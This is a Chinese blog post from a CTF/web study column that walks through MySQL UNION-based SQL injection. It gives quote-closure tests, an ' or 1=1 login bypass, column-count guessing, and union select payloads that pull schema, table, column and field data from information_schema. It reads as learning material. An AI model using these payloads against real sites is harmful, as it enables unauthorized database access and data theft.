sql注入 Union Query(联合查询)注入

最新推荐文章于 2024-01-30 19:24:07 发布
最新推荐文章于 2024-01-30 19:24:07 发布
阅读量921 收藏 3
点赞数 1
分类专栏: # web ctf 文章标签: mysql sql
不允许转载
本文链接:https://blog.csdn.net/weixin_46081055/article/details/119492169
版权
ctf 同时被 2 个专栏收录
85 篇文章 9 订阅
订阅专栏
web
48 篇文章 2 订阅
订阅专栏

根据sql构造的方式password或者username都可以尝试注入

select * from table_name where username='xxxx' and password='xxxxxx';

上句两处都可以注入

' 或者 " 测试框闭合

关于注释符 # 在get传参时候要注意用url编码 %23

' or 1=1 %23(#)

Mysql Union Query(联合查询)注入

union查询

查数据库

如果使用union查询,要先猜字段数量,因为通过union连接的两条SQL语句必须字段数列一样。

最后面加上order by 2 得出到底有多少行(就是一直减少到前端出来东西为止)

xxx union select 1,2,3,4,6,7,8
这里也要看看有多少select出来的可以在前端看到
把上面的数字替换为user()、database()、version()等查询

查表名

xxx union select 1,2,3,4,TABLE_NAME,6,7,8 from information_schema.TABLES where TABLE_SCHEMA='数据库名' limit 1,1

因为前端显示的限制,所以要limit,limit 1,1则代表从第一条起,只显示一条

但也可以利用函数将查询结果凭借

concat()、group_concat函数来,这两个函数我们可以简单认为是连接字符串,比如group_concat(user(),database(),version())就是把这三个常量的注入结果连接在一起,当做一个整体字符串显示在注入结果中

union select 1,2,3,4,group_concat(TABLE_NAME,0x3c2f62723e),6,7,8 from information_schema.TABLES where TABLE_SCHEMA='数据库'

0x3c2f62723e是十六进制,转换为字符串则是:“</br>”

找字段

union select 1,2,3,4,group_concat(COLUMN_NAME,0x3c2f62723e),6,7,8 from information_schema.COLUMNS where TABLE_NAME='表名'

查字段内容

union select 1,2,3,4,group_concat(字段名1, 0x3c2f62723e,字段名2),6,7,8 from 表名
shu天
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
oracle_union_operator
weixin_30399821的博客
11-01 227
SQL:UNION Operator This SQL tutorial explains how to use the SQLUNION operatorwith syntax and examples. Description The SQL UNION operator is used to combine the result sets of 2 or more S...
sql注入union联合注入
最新发布
m0_63436163的博客
01-30 733
联合查询注入是联合两个表进行注入攻击,使用关键词 union select 对两个表进行联合查询。两个表的字段数要相同,不然会出现报错。列数相同union 特性是显示两张表 我们就可以吧第一个参数变为------负--的 或者不存在的值 就行了 显示就是以第二张表为主。
MySQL学习笔记10:union 联合查询
AsajuHuishi的博客
07-21 197
简介 本系列(MySQL学习笔记)是我基于B站上SQL播放量第一的MySQL 基础+高级篇- 数据库 -sql -尚硅谷视频所做的笔记,方便大家学习和掌握MySQL。 说明 1.这个系列基本包含了视频中老师讲课的所有内容,包括知识点、案例、部分测试题。 2.所需的配套资料(来自B站评论区) @黎曼的猜想: 配套资料下载–>公众号公众号 DragonWell 回复:mysql 注意:是公众号!!是公众号!!是公众号,点那个 搜一搜 搜索!!! 不是私人号,是公众号!!! (可以直接在 搜一搜
jpa执行原生sql union bug解决
Super的专栏
06-27 3563
@Query(value = "SELECT * FROM count_entity where id=-1111 union (SELECT * FROM count_entity where video_name = ?1 AND platform ='腾讯视频' ORDER BY click_date DESC LIMIT ?2)" + "UNION" + "(SELECT * FR...
jpa+mysqlunion组合查询求和结果出错
YYZhQ的专栏
07-10 6750
UNION ALL 有两个表,A和B。 A表数据类似 id a1 a2 a3 a4 a5 1 5 0.5 a g1 ... 2 10 1.0 a g2 ... 3 15 1.5 a g1 ... B表数据类似 id a1 a2 a3 a4 a5 1
SpringData JPA 使用UNION 查询,自定义对象返回
weixin_39698872的博客
12-25 3871
场景:要模糊匹配两张表A,B的多个字段,返回符合条件的结果集。 A表 字段 name id update_time(BigInt) attribute1 B表 字段 name id update_time attribute1 attribute2 attribute3 JPA使用entity做UNION 查询,官网示例是同一张表,JPA对字段和entity的约...
sqlmap注入工具----一次简单的注入(实战)
weixin_33675507的博客
08-20 700
最近在学习网络安全,挖洞避免不了要使用许多工具,使用著名注入工具sqlmap的时候,对于英语不怎么好的我就比较难受了,本来就不会使用,加之又是英语的,简直难受。上网找了好多详细教程,但是命令实在是太多,感觉自己不可能一下就全部学会,于是决定一点一点慢慢来,用实战来慢慢熟悉这个工具的使用-----我相信通过每一次的记录我会慢慢变强! 这是墨者学院一个SQL注入漏洞靶场:http://219....
01_SQL注入_Mysql注入利用联合查询的手工注入
qq_42171569的博客
04-16 3806
01_SQL注入_Mysql注入:利用联合查询的手工注入 1.SQL注入的成因 【严正声明】仅供学习,勿做他用!!! 【严正声明】仅供学习,勿做他用!!! 【严正声明】仅供学习,勿做他用!!! 遵纪守法,做合格网民!!!! 开发过程中,一些开发者会直接将URL的参数,POST方法的参数等一些列外来输入的参数拼接到SQL语句中。上述做法会造成SQL语句的可控,从而使得测试者能够通过执行SQL语句,实现一些自定义操作。 $id=$_GET['id']; $fp=fopen('result.txt','a');
sql注入攻击流量情况
07-18
sql注入攻击流量情况
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
unionQuery:联合查询系统
05-18
一个通用的联合查询系统, 支持如下特性 可根据定义的查询sql生成查询表单, sql以及查询条件支持线上动态配置和修改 同一个查询页面中支持关联查询多数据库, 不同数据库的数据,目前支持mysql, sqlserver 支持多sql多数据库表sql间的递归关联查询, 如一个查询表单中配置了3个查询sql, 可用用第一个sql的查询结果中的某个字段作为第二个查询sql的where条件 单sql查询的支持分页 查询功能配置步骤 创建数据源 创建查询业务 创建查询参数 新建sql 查询
SQL 注入天书.pdf
08-06
SQL 注入学习天书
pangolinsdl—sql注入工具
06-20
pangolinsdl—sql注入工具 很好用的sql注入工具 界面简洁好用 使用方便
Spring Data JPA @Query注解用法
我的博客
04-14 1269
@Query注解 可以通过手写JPQL语句,实现数据库查询 package org.springframework.data.jpa.repository; import java.lang.annotation.Documented; import java.lang.annotation.ElementType; import java.lang.annotation.Retention; ...
Query注解的用法
weixin_44098139的博客
01-04 1405
@Query注解的用法(Spring Data JPA) 参考文章:http://www.tuicool.com/articles/jQJBNv   1. 一个使用@Query注解的简单例子 @Query(value = "select name,author,price from Book b where b.price&gt;?1 and b.price&lt;?2") List&l...
querydsl怎么实现union效果
ShuoTantai的博客
08-27 1237
```java private QMeasureIfMapPjt qMeasureIfMapPjt = new QMeasureIfMapPjt("measureIfMapPjt"); private QProjectSales qProjectSales = new QProjectSales("projectSales"); private QProjectPurchase qProjectPurchase = new QProjectPurchase("projectPurc.
MySQL必知必会 -- UNION组合查询
thermal_life的博客
08-24 185
复合查询 多数SQL查询都只包含从一个或多个表中返回数据的单条SELECT语句。MySQL也允许执行多个查询(多条SELECT语句),并将结果作为单个查询结果集返回。这些组合查询通常称为并(union)或复合查询(compound query)。 有两种基本情况,其中需要使用组合查询: 在单个查询中从不同的表返回类似结构的数据; 对单个表执行多个查询,按单个查询返回数据。 创建组合查询 分别查询: MariaDB [test]> select class,user,sex from users w
[ctfshow]web入门——反序列化(web261+web264-web267)
ShenZ的博客
03-02 5890
[ctfshow]web入门——反序列化 反序列化 unserialization [ctfshow]web入门——反序列化 web261 web264 str_replace字符串覆盖逃逸 web265 web266 web267 yii系列 反序列化 unserialization[ctfshow]web入门——反序列化
写出SQL注入检测系统的Python代码
09-08
答:下面是一段用于检测SQL注入攻击的Python代码:import redef check_sql_injection(data): regex = re.compile(r"[;'\s]?((SELECT)|(UPDATE)|(INSERT)|(DELETE)|(DROP)|(ALTER)|(CREATE)|(TRUNCATE))\s+[\w\s,]+", re.IGNORECASE) if regex.search(data): return True else: return False

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

shu天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值